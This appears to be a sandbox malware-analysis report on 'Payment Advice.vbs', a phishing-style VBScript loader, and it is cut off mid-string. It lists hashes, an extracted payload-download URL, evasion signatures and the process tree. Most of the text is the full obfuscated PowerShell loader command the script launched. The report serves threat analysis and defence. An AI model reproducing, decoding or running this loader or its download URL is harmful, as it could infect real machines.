3a8e672d0d59855db74d28528c41684357e7e534312f8feb3908c5e4d5856678

General

Target

Payment Advice.vbs
Size

52KB
MD5

3111ae1b6a9e1c173eaf3a7bda34ca7f
SHA1

c2a6e03871105706b5889bd1078a402efc67a268
SHA256

3a8e672d0d59855db74d28528c41684357e7e534312f8feb3908c5e4d5856678
SHA512

5533f1ca1c0588d2fee1b9aa0c1977ac539ebe86db30b1d022239fbc3276e9d87a4c79a399ae68e37a039acac95f7a703ff23070596a7643a33c17baeab79af1
SSDEEP

768:r+1VMDvbrLLMAedsaNLQnxeP+Fs4ofdESVBrps/7hk1+N52K:rvLLYAeCaNMxefwDh

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://megookbpnq.cf/Kvin.snp

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

5 1400 powershell.exe
Checks QEMU agent file 2 TTPs 1 IoCs
Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry
T1012

System Information Discovery
T1082

Processes:

powershell.exe

description ioc process

File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe powershell.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

powershell.exe

pid process

1400 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

ipconfig.exe

pid process

1808 ipconfig.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

752 powershell.exe
528 powershell.exe
1400 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 752 powershell.exe
Token: SeDebugPrivilege 528 powershell.exe
Token: SeDebugPrivilege 1400 powershell.exe

flow	pid	process
5	1400	powershell.exe

description	ioc	process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.exe

pid	process
1400	powershell.exe

pid	process
1808	ipconfig.exe

pid	process
752	powershell.exe
528	powershell.exe
1400	powershell.exe

description	pid	process
Token: SeDebugPrivilege	752	powershell.exe
Token: SeDebugPrivilege	528	powershell.exe
Token: SeDebugPrivilege	1400	powershell.exe

Suspicious use of WriteProcessMemory 13 IoCs

Processes:

WScript.exepowershell.exe

description	pid	process	target process
PID 520 wrote to memory of 1808	520	WScript.exe	ipconfig.exe
PID 520 wrote to memory of 1808	520	WScript.exe	ipconfig.exe
PID 520 wrote to memory of 1808	520	WScript.exe	ipconfig.exe
PID 520 wrote to memory of 752	520	WScript.exe	powershell.exe
PID 520 wrote to memory of 752	520	WScript.exe	powershell.exe
PID 520 wrote to memory of 752	520	WScript.exe	powershell.exe
PID 520 wrote to memory of 528	520	WScript.exe	powershell.exe
PID 520 wrote to memory of 528	520	WScript.exe	powershell.exe
PID 520 wrote to memory of 528	520	WScript.exe	powershell.exe
PID 528 wrote to memory of 1400	528	powershell.exe	powershell.exe
PID 528 wrote to memory of 1400	528	powershell.exe	powershell.exe
PID 528 wrote to memory of 1400	528	powershell.exe	powershell.exe
PID 528 wrote to memory of 1400	528	powershell.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Payment Advice.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:520

C:\Windows\System32\ipconfig.exe
ipconfig /flushdns
2⤵
- Gathers network information
PID:1808

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell write-host shell.exe
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:752

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Overnu = """ShFAbuUbnFacFitGliUnoNdnun foDSmedicMooInlBroUlrBeaNanTi0Ga2Ga Af{Ni Kv su bo PepCoaSrrNoatimVa(In[PrSHitForDeiPrnUrgSl]Fr`$SuRAneCopForMeoLidBauTocCo)Di;Sk Ti`$TuTLlaFonBenMeoStgla Ov=ga Pi'Sp'Na;Re AmWStrBeiGetLoePo-ArHThoFlsIntFl In`$DiTMaakanEgnPtoTrgho;Hy DuWRerOpiKrtFleVo-CoHEnoTisSitBe In`$SmTUnabenManOpoFrgTr;No OuWHyrViiFotSoeRi-VaHProDisDetRe Mo`$GuTReaIlnDinBaoRrgPh;Or Un Fo In Ar`$WlCHehCooBokPoeov Ac=He SvNMaePawFu-unOPibpajDaeancEatSt CabEuyVetOueFu[Hd]Th ov(As`$FaRfoeAtpForTroChdBouSmcIn.PuLsaePenSagTetSahVi Af/at Id2La)Ov;Sp Hi Te Bu DeFBaoolrAm(Il`$OvBchaUngSavDaaom=Ho0St;An Sp`$UnBPoaSugAlvStaFo Ar-GrlEltCy Cr`$DiRKueKnpCarneoLadSuuEacTo.EmLSyetrnEsgputRihKa;Le Bo`$BoBLaaPlgKovSyaKe+ve=St2Mo)Pu{Fo In Ra Ud su Vo Ne os St`$FlCVahCeoAgkGeeTr[Ho`$AnBSuaMigFovAmaAt/Ma2Dr]Co Ko=Ti In[AacSaoPnnSivMaeWarRitAn]ba:Gi:PoTIsoNoBDeyYotFieKu(Ja`$SvRMaeSipInrKooTidTiuAlcHs.RoSPluExbBlsFatskrJuiOfnhegBe(Pe`$PaBFlaLygtbvLaaTy,Fo Rh2Vo)Ir,St Sc1Po6Di)Hu;Ov Du Bi`$QuCIshOpoRakUdeSl[Ko`$PiBAraMegFivfoaUn/Ga2Pt]Bl La=Se Ro(Ap`$SkCFyhPeoSlkReeop[Ci`$ApBAsaAugPavHeaIn/Ar2Fe]Li ba-SnbIdxVaoFirFe Me1By1Be8En)Gu;Ma Pr ma Ti My}To Sk[geSTrtPorMaiLanUdgHe]Re[orSEnyMasAltreeNemSk.DiTOueOnxPotbj.RiEStnLucHaoDedBeiChnSkgSy]Eu:Sm:PhAPrSArCFoINaIBo.KrGHveMatTuSsvtHurPaiAnnAkgBl(ar`$trCSehAfoPrkvoeJe)Va;Sc}Ga`$KnCSchSmumatUg0af=ThDUdeGacSkoPrlProtrrHlaHvnhi0St2sp Ra'be2Ud5An0PaFHe0Kr5Bf0Be2En1Gl3su1OmBBi5Sk8Sk1Ko2Ed1UnAEs1SeADk'Mi;Fa`$SpCBehKvuDitAf1Op=FyDBeeNocinopolRioChrGeaConUf0Ur2Se To'Br3MeBDi1SiFDe1Dr5In0Sc4Pl1Ud9No0Is5Sk1Po9He1De0sy0Va2In5Ru8Br2co1Su1BlFPe1Am8Pe4Sc5Sa4At4bo5In8By2Ha3un1Un8Ko0Do5Br1Di7Ci1Fu0Go1Op3Ko3Dr8ge1Sl7su0Sa2Ro1InFRe0Mo0Re1Ko3un3ErBPe1Ye3Sa0Re2Th1ErENe1Pr9Wa1Fi2Qu0Pa5Sp'Su;Ko`$GuCAnhSauPltEm2An=CuDHneBocBaoBrlDioCorMiaDinAk0Mi2Yi pi'Na3Bi1Te1Wi3Gr0Fr2yo2Cr6Po0Dy4To1Ch9Ca1No5Fr3Ra7Tr1Is2Sk1Pa2Fl0Sk4Ba1Po3In0be5Pa0Sk5Ne'Al;Br`$TeCRehAnufotVe3Bi=ZeDCoeuncLeoinlDaoInrSoaSunSi0Sp2Kr We'Pe2Fr5Op0BeFBa0Mi5Si0da2Gr1Ov3Te1maBHa5Bu8Un2Ap4Fi0Im3Gu1Hy8Un0Te2Sk1SkFAk1MiBNo1In3un5Sl8Ba3SwFTh1ma8Cr0Ti2Po1bo3Wo0Ca4Up1Ob9Mo0fi6Ch2Op5Be1Me3op0El4Ko0Sy0Ph1EvFDe1Pr5sp1Pu3co0Do5Un5Di8Du3BiEAe1Re7De1Re8Lu1Se2Is1DeAFr1ma3sp2Ld4Re1Ar3Ru1Fr0Xy'Un;Ne`$HaCDuhFsuKitSp4Su=moDSleDoctioSalHaoPorSoaErnFo0De2te Sk'Sl0Ps5Te0Pr2Du0Be4In1DeFUn1Om8Un1Bo1yn'ia;Mo`$AvCSehReuBotAl5Ga=KvDEbePrcKooMilOaoSprAbaUnnPr0To2kr Ma'pr3Mo1Br1Co3Ud0Sy2Fo3SeBKn1Sa9Li1Am2Do0du3Oc1ReAQu1mi3Ri3BrEAf1Gu7In1Lr8Om1Fr2Re1CrAJo1Ba3Cu'Sa;Fo`$InCDohMiuNotKl6St=CaDBaeSkcEkoAflGaoMorblaMinAc0In2Sv Cr'hu2Ja4Se2Wo2Op2Sc5Do0Se6Ai1Fj3Le1Hy5Su1CoFUn1Pr7sk1UnASo3Ta8Po1Sv7Pr1brBUn1Po3Sa5SoAPa5un6Vi3coEPo1AtFNo1Sw2Im1St3Mi3Pr4Ar0ByFFi2Ag5Au1StFPu1Fl1Ov5RoAKo5Bu6No2Ad6Gl0Hj3Ci1Ja4Af1OvARe1MiFaf1Yd5Di'Re;To`$PrCHahPruFotUk7Co=BoDSpeSacbooNelMooMirTeaWanPe0Ud2In Ap'Sl2Go4Pr0Un3Mi1Ve8Re0So2Ca1DuFRe1DiBro1Ne3nr5SlAAg5De6Oy3HoBUd1Fo7St1Mo8Ov1br7Ab1St1Dy1Bo3Af1Re2My'Te;Pr`$SyCArhFruHotEf8Gr=FyDFleGhcEnoInlSwoOxrTraBenTh0Gn2Nu Th'Lu2Di4Ul1sv3Sa1Tu0da1MeAAm1En3St1Sk5Hu0Ch2Po1ek3Ca1Mi2De3As2Ov1Ba3Sn1FiAUd1Tu3Se1La1Al1Br7Be0Ca2mi1Kl3sk'Ha;Li`$AcCUnhEkufyttu9Sm=GlDLueFrcLyoStlLaoRerNiaSpnBo0Hy2Da Ho'no3ShFBe1fj8Al3ScBFi1To3Eq1EmBVe1Pr9Va0Da4ep0SpFre3AeBSa1Ka9ti1Ve2Se0Lo3Re1HeAUn1Sp3Su'Le;Sp`$GeSUneAkrHatCouMamDadFliNopJa0Ov=AbDcieBlcBaoAslBooDorReaManfo0Or2Su Se'Re3AnBHe0UnFSp3Hu2Bu1Gi3So1UnAkd1Hu3Sc1Af1Co1Sa7Ud0De2fe1Su3Af2At2St0SlFPo0sp6Em1Sk3Fe'Ve;Li`$yaSAmeEnrVrtOluMamRedSkiGopGr1Di=ReDGlebocReoSalSuoEkrSnaEfnVk0Un2St Ko'Ur3Ca5Tr1ZeASt1de7Ja0Dr5Un0Un5Py5PrAIm5Re6Te2Ny6Ch0Dr3Di1Va4Sa1CuAam1UdFat1gr5El5SvAFe5Cr6Un2my5Bi1Sn3Pe1St7Un1KiAWo1Ca3St1Gr2Im5NrAOp5Bo6Br3Re7Fr1Vi8St0Ir5Ho1CrFPr3In5Me1beADo1En7Ta0pa5in0Kl5Te5PoANo5Re6Te3Ra7Ud0Br3Ln0st2Ta1In9Sk3Ov5Fj1GyAAb1Ki7Ra0Od5Na0Ci5fr'fr;Ud`$MeSMaeSarUltGauSimmedBuinopRe2Fo=FrDKoeSacStoOplTuoHurAtaPhnNo0Co2Ca Ce'Om3guFGl1gr8Pe0Ol0Ad1Re9Pr1FiDes1Mi3Kr'Ba;Se`$ReSStePerLotEpuBamBodSpiSppMi3Mo=FaDSveMocNooInlReoOvrUnaNonFe0En2na Ps'Us2Le6Gu0tr3Ra1Fi4Wa1CoAAu1AkFBu1Al5Vi5UdANo5Pi6An3toESa1DoFAf1Kr2Cy1Ch3Vr3Ca4Pa0ApFSu2Tr5Sq1BlFTh1an1be5TsAPa5de6Ac3Co8Aq1vi3Re0Eu1ap2Ri5Ka1KeAri1Ma9Pu0Be2Pe5siASk5Ac6Hu2li0Ta1udFPr0Co4Tj0Gr2Ou0Up3Pr1El7In1NoAOp'Ph;Sn`$KoSVaeAfrDitSauSkmGodRaiSupAe4Br=UnDFleMacOmopllSkoHirNoapsnsn0Uf2Al Zo'Co2As0St1NuFUn0Fu4Bi0Ci2Me0Ko3Om1De7Un1MoAes3Ek7Re1PrAVe1BeAEf1Aa9Be1Te5bj'Ad;Co`$CeSAdeAkrVrtLauGrmQudRoisepSt5Ap=JaDPoePocHioBelHuoHerInaNenSk0Lu2Su Ta'Br1dd8Ri0Ko2Un1Sc2Su1UdACo1FiACo'Ec;Vo`$ChSOveGerChtmiuEumCadBeiUnpIr6An=ReDOueuncAvobrlPeoprrOvaVinFi0Fa2Ev To'In3Ge8Oc0Go2Of2Eu6To0Pa4Ma1Ho9Pa0Ir2op1Gr3Co1Tu5Bl0Re2Ta2Up0Un1BaFFr0De4An0Sm2Bu0Fo3Af1Ps7Bu1AtABr3ViBIn1Be3Fr1InBEx1Sc9Bj0Pl4Fu0FiFTr'Le;En`$StSPreShrBetFeuBimPadSyiCepMn7In=AmDVieStcVooSplUnoSerPeaRenpo0De2Sk Al'Ma3InFVi3Tr3Ba2PrEIm'St;Eg`$ReSineRerNotkauScmOvdBiiFipTy8Fu=SkDReeDucUnoBrlpaoCarInaSknTe0In2St Re'Al2PrAne'Da;Su`$BlORkdSiiFllReoVimKsegldRh=MaDsteBycKooLalGeoInrGoaUnnCo0Un2Be Hi'Ac2fl3Ma2Sc5Be3Bl3Fa2Un4Pi4Sk5Bo4Fr4Eg'An;Cy`$StRSweCupporMaoTrgDerTraBemPosAn=BoDPaeTicSkoSrlChoArrlaamonPa0Ud2So Ho'Ec3By5Or1Sc7Ti1TuAUn1RyABi2go1St1UvFUp1Om8Ch1Pl2An1Fl9Af0Fo1Re2Ac6Fi0Sp4Ra1Lo9Sp1Ov5Ce3Pr7Bl'Ls;ChfAnuTenEkcPotKuiSpoRanKa slfBekAfpJo Sy{BaPAnaForFraTemUe Ru(Vi`$UnEprnUddPriHjtWhiUnnAl,Br me`$AncBueForAkeIsbLurCaaTrtOv)Ou Bi Ex So Ch Br;Sk`$CoOSarPrgCoabrnSmiDesunathtRu0Wi Ta=ReDSteBrcGloColNooRerAfaHynAk0So2Cy Br'Ud5Fr2ve3ni1st1ge7Re1No4Sa1Re3Fn1En8La1Di2ba0Es3Pr1erBCo5Di6In4NaBHj5Si6De5GrEIn2KlDTa3Fi7di0Dy6sc0Br6Tr3Vi2Mi1Un9Sc1EkBJa1Gr7po1BrFFa1Sh8vr2PtBFj4PlCVo4ToCFi3Et5hy0Ba3ua0Un4ph0Fy4Ba1po3pa1Sm8br0In2Si3Fl2pi1Kl9Hs1MiBTw1No7Hi1TiFCr1Sh8La5Pu8Au3Sr1Re1Vr3Va0St2Ga3Tr7Pe0Be5Ig0Op5Cu1Ha3Br1ChBaf1Ne4In1MrAAr1HaFMi1Ma3Fa0Ku5Vo5EyEBn5StFMa5Uk6Pa0SaABr5Ov6Me2To1pt1HyESv1Hi3gr0Tv4Sl1De3Bo5baBSt3Sy9Me1Sl4Bl1HaCOp1St3Un1an5To0Pr2Cu5Ta6Cr0LoDNa5ge6Br5Su2Te2Hg9Re5No8Le3Mi1Pr1EtADe1Sp9Ca1In4Li1Si7Am1FrAPu3pl7Be0Sd5Sk0De5Hy1va3An1RoBAd1Ve4De1reALy0DoFun3Se5Un1Re7Af1Ab5Gr1MoEOp1Ta3Re5Di6Cy5DeBLy3Di7La1Ha8Je1hu2Re5So6Sa5ca2Ko2Sc9St5He8Ti3MoAHa1Sm9In1Hy5Ru1Hj7Ma0Re2St1BrFKo1Co9Sa1Di8Mi5en8Ac2Vo5Ty0ai6Ab1leACh1FeFPl0Po2Ki5LaEUn5Sk2De2Ak5Tv1Sh3Un0Vi4th0Fi2Fl0de3Br1AfBIn1Ca2No1VoFDi0De6me4MoERa5ReFOu2ToDSt5PaBOp4Ee7ti2EcBFo5Ba8Mo3De3Bo0Jo7Mo0Ny3Ap1Af7Po1DoATj0St5Le5NoEGl5De2Ti3Fo5Ne1piEBi0li3Ry0Ki2Co4So6El5SlFSo5Un6Be0PrBRl5PoFas5Bi8co3Oi1Sm1Ar3Pa0Mo2pr2Ek2An0PoFUm0Un6Af1Ho3Sn5YaEEx5Gn2Or3He5sa1ZiETr0An3ba0Ug2Ch4Im7pl5PaFAr'Pa;Al&Re(Pa`$BiSSteTrrVetUtuEfmovdUniAlpNd7Fl)Sl Mo`$stOBirAfgSkaSnnRaiEdsFaaSptUd0Ju;ak`$OdOStrSagTiaErnWaiCesReaSutAr5As To=Sy StDVgeTrcKaoAnlUdoTrrReasknAn0Um2Ve Co'Ra5Oc2Pr2Re5Ju0DoFLi1Fl8Th0Sk2St1Af7Po1PoDCi0Hi5Ek0Am2Ne0Fl4Gr5St6La4MiBGa5Un6Ut5Cy2Me3Rr1Bn1Gu7Ru1Bi4Pr1Ps3Pa1Be8Em1Lo2Kp0Ty3Sp1FrBTi5Sm8Te3Up1Br1Ge3Br0Ov2Fl3MaBAa1Cl3Ve0Ca2Kf1RaEEm1Fu9Sa1Op2Ho5HvEIn5Gi2Fi3Gr5Fa1BrEJo0St3In0En2Di4Sp4Tr5CoAbr5Au6Bi2GlDAr2Fe2Ud0DoFSo0He6Re1at3Di2UnDOr2GiBFi2HoBIr5sa6Kn3Su6Th5SoEre5Po2Co3Tv5Re1ChERa0Ud3Sl0Vr2Mi4Tu5Mi5FrAUn5Pa6is5An2Co3Fo5Ac1TrEUn0se3Un0ac2Ma4Ko2Ra5blFFo5grFDo'Ru;Ho&Su(Du`$InSInekarPetUpuErmEpdCaiCopEl7Mi)Fr De`$etOSlrWagOpatrnviidysUnaDitSk5Ma;Ad`$brOPerImgNoaManDeiBrsHvabotLa1Er Up=No AnDTrespcSvoBelBioBurMeaFonCh0Be2Gi St'In0Be4Da1Af3Ge0No2No0Ru3Ym0St4Do1He8Dr5Ci6Br5No2Un2Po5Pr0MaFOv1Sa8Mi0Co2St1Sk7Su1noDIs0Ti5Un0Ma2wr0be4Pa5Po8En3EcFSl1Mo8An0Sa0Ac1Ov9Te1LuDAp1Kv3Sc5baESo5Sm2Go1Fa8Fr0Ge3Re1TaAFo1TiAIn5SvAMi5Po6Th3Ec6Bo5OsESt2KiDSp2Fi5Pa0giFUn0Po5Si0Sa2Sn1Uo3Di1SiBDi5Sm8Ac2Va4St0Fu3Sc1Di8La0Tr2Ge1GeFPe1EtBPa1pr3Sm5Gn8Sa3TiFRo1Er8Hu0Bo2Re1Va3Gl0Li4St1Da9Ma0Ka6Dr2Pi5Ha1Pe3Bu0Ho4Br0Kl0St1KuFCa1Ov5Se1sv3Th0Ti5Af5De8Rt3EkEZo1Sl7Gu1Bi8Re1Fo2Na1SuAFe1Fl3Oc2Re4Co1Up3Mo1Gg0An2AnBPh5CrESo3Gi8St1sn3En0My1To5ElBFo3Jo9Fa1An4Br1PrCGu1Te3Bu1Do5fa0Fr2Mi5Co6kr2Fr5Eu0AmFEn0Se5Ac0Fi2An1Pu3pe1BuBgo5Sc8To2Va4Ud0Un3Fa1Ri8Sa0Fi2Sw1TuFBr1ArBVe1Ko3st5Wh8Bl3DeFBu1Om8Sh0Pr2Gj1Sp3Co0Re4Tr1Af9Is0Re6He2Be5Fo1Va3Do0Mi4da0un0Re1CoFCo1Ph5Di1Si3Ci0De5No5Wo8Fa3RaECa1Ki7Hv1Fl8Pr1Fy2Po1RaARa1Ex3Be2An4Br1Sl3To1La0To5FiEDa5TrEAc3Ra8Re1Te3Yd0Se1fe5TrBTa3Sa9Me1Fe4Ko1EkCCo1Et3Di1Ud5Al0Uf2He5Ca6Ub3AmFFo1Sa8Te0Va2Re2Un6Lw0Ov2In0Pa4Ha5FiFSv5InAIn5Kl6By5OvETa5Bo2Fa3Af1Kn1St7Ka1Un4Je1Fo3Si1De8Ph1Ar2Ox0Ha3Di1MaBSe5Gn8gi3Ha1pa1Gr3sv0Ev2Sa3AxBGy1Gr3Ga0Us2Ov1KjEAf1An9St1Bj2De5AuEDe5Ov2Mi3Ph5Ca1BrEJo0Af3El0Fo2Fr4ko3To5BrFMi5BuFSo5So8Bu3InFHe1Pl8Me0Mo0Fo1Bh9lo1AaDFa1To3St5UnEEk5Tu2Fo1op8An0Fi3Pe1GlAUn1KlAPi5FoAfl5La6Ca3Se6Ch5DhEIm5Ta2Ca3Pr3Su1De8Dd1Ef2Le1CuFDe0tr2Dr1spFSi1De8Su5ToFfu5ReFTr5TrFMa5ApFSk5HaAPi5Gr6Ba5Du2Me1Mi5Da1Pa3Sk0St4Re1Fj3Su1Sk4Sa0Hi4fl1In7Af0li2Vi5unFFe5UnFSo'Tu;Wo&Me(Co`$AeSSkeFrrUntBauSomHodZoiBepSp7Ab)Ti ta`$PaORerTrgIdaFrnThiHosOvaAutUb1bo;Un}RgfSluPanSacKetOpiSpoInnGl AvGCeDHeTBr Pl{ViPTiaStrHyaRamDr Ya(Ra[PrPDiaUnrSaaKimNreAntSmeUnrHy(WoPaloUnsDeiActSpiBioSanRe Ja=Wi Tr0fa,Fl NdMFeaBanAsdPuaFitAfoPyrmiyWh fe=ke Su`$JoTunrElubjePo)Ku]In Fy[GrTBryVapSkeGo[Hy]Co]Te Pr`$UnAUdlChgHyeDarCaiKosOm2Kb3Po0Fl,Cl[SkPNiaslrPoaOrmHreMatMaeBurHy(BoPEroDesEditatKiiUnoBencr Ha=Es Le1Sl)ed]Ph Re[JoTAnyHapRoeSp]Fo Fo`$StSFovPaaInjTieStnLudDoeMopSl Ky=Hi Pa[FoVUnoBriTvdBa]Sk)Be;Sh`$FrOTrrNygToaUvnReiAvspraObtve2Ud Ko=Fo MeDCheSocSpoVelHjoCarTraNonul0De2Pe Hi'Ma5to2Mi3CuAco1Tr7Va1Ag4Te0ClFvu0Yp4Te5Ba6Ow4StBIc5Da6He2InDMa3De7Ge0Pr6Di0Ko6Ge3Be2Pe1Fe9Op1FoBLi1Fo7Sj1UbFEr1Lu8Sk2JaBOa4SqCOv4SaCAn3Po5sa0Mi3Re0Pa4En0Ly4Sk1He3de1Sk8Sl0Py2Un3Li2Sa1vr9ge1NoBTi1Ad7sp1heFIn1Af8In5Id8Zo3Ta2Hy1Al3As1Fo0Op1SaFSa1Re8Wc1Pl3To3Lg2Ur0FlFFl1Un8Nd1Qu7ko1foBMi1imFBr1Bo5Fi3Ra7Sa0Se5La0Ta5Un1Re3Ba1saBMg1Bo4St1AlACo0StFRe5DiEFi5QuEMi3Am8Un1Si3An0Ex1Ge5AfBTr3Co9Dr1He4Me1StCta1Pe3St1Ac5Ma0To2Mi5Su6Im2Sm5Pa0PuFTa0La5Pe0Ma2Lu1hu3mu1DyBPl5Di8Of2Go4St1Gr3Li1Me0In1PrASp1Ne3Bi1Je5Ph0In2Or1AlFCi1Ja9No1Re8Re5co8Pr3Sk7mn0Sv5Ov0Fl5Or1Ge3Di1PoBDe1Ku4Un1HoAWo0skFLa3Re8Ba1Jo7Pr1CyBMe1Un3Be5SpECa5Me2Af3ov5Sh1KaEdi0Du3Ha0Ne2Re4MlEKo5CaFPr5PoFEk5ReAMe5Sm6Lr2RaDAn2Fo5Ge0DaFsk0Di5Va0la2sy1Ph3Mi1SkBan5Fr8Sp2Do4Tr1Ag3Sm1Fr0Su1anARe1Ku3Sk1Fo5Ka0Cr2Om1UnFAv1Re9Bu1Tr8ae5ch8Be3To3Ja1RiBAf1AdFCo0Ch2Sa5Up8Ar3ro7My0Me5Rh0Fa5Re1Mo3Ls1TaBDg1Ub4Sp1SeAFl0FjFPe3He4De0Rh3Pr1LnFGe1WaAIn1Hy2Pa1As3No0we4Sh3Em7Ta1Sc5Rd1Ar5Is1De3Lu0To5zo0Co5Ke2ScBFi4koCGe4FiCho2ps4Ta0Tv3Da1Pr8Mo5ReFUn5Ef8lu3Un2Un1Ta3qu1Sa0Po1OmFBr1Ov8Ji1Ve3Ou3En2Br0ChFma1Di8Br1Ma7Tr1foBIn1BeFTa1Bi5Ne3IdBWh1Ha9Hy1Re2Ke0st3Kl1AsAKa1Un3De5AkEai5Sp2As3Pi5Lu1reEGe0No3Ko0Go2Ar4SeFHy5PjAHu5to6Pr5Cp2Hi1Ma0Ja1Ne7In1QuACo0Is5Sa1Re3Gr5SlFSp5Nu8es3Fo2Fe1Vo3Qu1Sv0Al1DaFCh1Va8Ni1st3hi2Co2pl0AsFGy0Sa6Re1Je3Cu5PoENa5Ma2Gr2ma5Gl1Am3Ma0Dr4Sy0Ha2Va0St3Hj1geBNo1ar2Ru1PiFNe0Bl6No4Ar6un5MeATe5Re6He5Ra2Po2Op5fl1Do3Ze0Sp4Re0Ap2Sv0tr3Ov1ReBCr1Te2Al1HvFVa0mi6Po4Mi7To5StAUn5Ko6Im2IdDSe2Ra5Sp0GyFGe0In5wa0As2As1Fa3Ko1SeBGo5Sa8sk3AnBMe0Pu3Un1AsAUn0es2Ve1FiFDi1Sl5Bi1tr7Sc0De5Fo0Ch2In3Sy2Fu1Di3Pe1InANo1Op3Ag1Kr1La1Ca7De0Ne2Re1Pa3Da2ViBBr5UnFom'be;Ul&ur(Hi`$meSOreForSatVeuGlmSkdWhiStpGe7Se)Af Un`$YaOSurKugNeaSlnOpiOusStaSutPo2Sn;Mi`$UdOClrWegPeaOmnMeiUnsAmaSttRe3Fr Sa=Bi LnDGaeSicDeoMolAnoBerAfaCinRe0Ib2Sa sc'Va5Pa2Su3ArAMe1No7Tr1po4ec0OvFSk0St4Gu5Ra8di3Ap2Or1Br3Ri1In0Bi1BlFVa1Me8Sk1Ka3To3Bl5Bi1Ka9Sn1Pr8Mi0En5Ma0He2Fe0Br4Tu0Co3Ro1Po5Va0At2ke1Se9Rh0sa4In5IdEKl5Co2Fo3Un5ep1TiEdo0ph3Tr0si2Se4Me0Si5LaAAn5tu6Os2SyDUn2Un5Ch0PrFVr0Wr5Sl0Sp2Gi1Ba3Fe1KyBNo5Ud8sc2St4Un1Ap3Ka1Li0Si1BaAud1Sm3Br1Ef5Fo0Ne2Pr1CoFMe1Sp9Ke1Nr8Se5ga8mr3Ra5Be1Va7So1LoAHy1GaAAd1BrFHo1er8St1em1br3Mi5Be1Br9Ks1fo8Kj0Dr0Ro1Dy3Pa1Sc8Dy0Ov2St1DaFSa1Gl9mi1Sa8Pr0Sp5Ga2VrBPe4FeCOv4PyCNr2Su5Id0Ud2Be1pu7Du1Sj8Ku1St2Vi1Af7Kl0Fo4Ga1Rm2Uf5ReAIn5Kr6Sk5No2hu3Pr7Im1CyAMa1In1Ud1Be3Ps0No4Fr1ReFGr0Sp5pr4Li4Pr4Cl5Mi4Fy6Ep5NoFBe5Br8Ek2Dr5Re1Af3Ro0Hl2Pa3plFTi1PhBWh0be6Mo1DrAMi1Fj3Cl1cuBAn1Un3Su1Re8te0Po2Sc1Fi7Tr0Er2ba1KyFVi1be9Ha1St8St3Jo0Lu1SkATa1Ra7Na1To1Fi0Cu5Ma5unEAp5Sa2Nu3Bo5ph1PaEku0Ma3Br0Bo2Be4Pi1Re5DeFSk'Sa;De&Sk(Ru`$knSSaeDerAbtTeubemSedReiSlpSk7Re)Ba Da`$AkOTorOygUraFenAriShsInaCltSu3Sh;Sp`$TrOTerEfgBaaAunDiiStsBlaHotMa4Le Op=Da BeDAleKocFroMelMaoPrrLhaFenSt0Un2Qu Ka'Un5Du2Pu3DiAAn1Pe7Sc1Sn4St0SiFEp0Ve4He5La8Go3Dr2Pi1Va3Re1St0Pe1EtFba1Uo8vi1Co3ak3CoBMi1Fe3St0Re2Fa1shEpa1Tr9Ov1ja2Im5TaEGa5Cr2Ni2Ru5He1Ga3Me0An4As0de2Fl0He3Ke1GaBZo1Ti2Pr1SaFVi0Hj6Ra4Ki4Te5MiASa5Ho6Ul5Ar2pa2ho5un1By3Ad0Cl4Ax0Fe2Sa0Ka3Dr1DeBeb1Pa2Wh1FjFAn0Dy6Th4Lo5Af5ChAEn5Gi6La5Kv2po2Bl5In0Ua0Vi1Co7Di1BeCCa1Bu3Fo1Un8Ha1Go2Fo1Kl3Un0Mi6Ef5PoAFo5Mu6Im5Tr2Pl3Mi7Be1BaACo1Sy1Ex1Aa3Gr0Fi4Ha1OpFLa0Ad5Su4Re4em4Bl5An4Fa6My5HoFSl5Co8In2Sl5Ru1La3Li0dr2Ra3CaFFi1ReBta0Qu6mi1UnAou1In3An1ViBDo1Ma3Oo1Mu8co0De2Ex1Lu7Ca0Pi2Gi1shFDi1ra9Nu1Tr8En3Ca0Ma1OpADr1Mu7Sp1Re1Na0Sa5No5BaEKe5Ra2Go3pe5Pr1UnEAf0Ab3Kl0Cu2Ri4Fl1Fi5DiFSp'ta;Te&In(Se`$MaSHeeinrgetApuPlmKodCyiInpPe7Kv)La Sa`$SlOMarOmgBjaTenEniVrstiaRetGy4Kv;Hi`$GuOSprThgMaaLanCaiMosOvaRotNo5Fr Ar=Op blDSteancInoTrlLoobarAmaadnTu0Sy2ni Af'an0ly4Ey1Al3Pa0No2Ud0Pa3Da0St4th1Vi8Re5To6Ka5Al2Hy3UnABa1Sk7Un1Me4In0EkFKu0Lu4Pr5Re8ka3Sh5At0Ma4Sn1Ch3In1Hu7Di0Sy2sk1In3lu2Si2Ma0BrFFr0Oc6in1Do3Ti5FoEDi5GrFEn'Ra;Do&Kl(Wa`$OuSAmermrEptLeuOvmGldChiHopBi7Da)Gi Fl`$ReOStrChgGlaAsnReiZasIsaIntEr5Sp Br ny Li;En}Co`$AtUBadSusZikUnrVeite6Ty5Tr Se=Pr ElDUneRecEgoEnlDioFrrSaaTinKl0Sh2Tr Be'Pr1NoDOa1Bi3Ci0Ha4El1Se8Ga1Su3Ty1OmASl4Cr5Te4Po4Ba'La;Le`$BrOGlrPrgAkaUnnSpiMusSmaSttHa6Wh De=To StDPreCocSpoDolinoBlrCaaUnnSk0St2se 